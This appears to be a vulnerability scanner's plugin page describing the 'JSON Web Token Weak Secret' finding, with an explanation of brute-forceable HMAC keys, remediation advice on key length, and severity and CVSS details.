JSON Web Token Weak Secret

high Web Application Scanning Plugin ID 112697


JSON Web Token Weak Secret


JSON Web Tokens can be signed to protect against data tampering. By using an asymmetric or a symmetric signing algorithm, the application computes a signature of the token data which will be verified during token decoding to ensure its integrity. When using a symmetric algorithm, the signature is created from the chosen HMAC function along with a secret key.

Using weak keys makes it vulnerable to bruteforce attacks, allowing tokens to be manipulated and signed on behalf of the application. Depending on the token usage, attackers could leverage this vulnerability to forge valid tokens and impersonate other users, or gain further privileges.


The secret key used to sign the JSON Web Tokens in the application must be stronger (long and random) to prevent it from being retrieved with a bruteforce attack. Note that the JSON Web Algorithms standard (RFC 7518) defines the minimum key length to be equal to the size (in bits) of the hash function used with the HMAC algorithm.

See Also





Plugin Details

Severity: High

ID: 112697

Type: remote

Published: 2/11/2021

Updated: 9/7/2021

Scan Template: api, scan, pci

Risk Information


Risk Factor: High

Base Score: 7.8

Vector: AV:N/AC:L/Au:N/C:N/I:C/A:N

CVSS Score Source: Tenable


Risk Factor: High

Base Score: 7.5

Vector: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N

CVSS Score Source: Tenable

Reference Information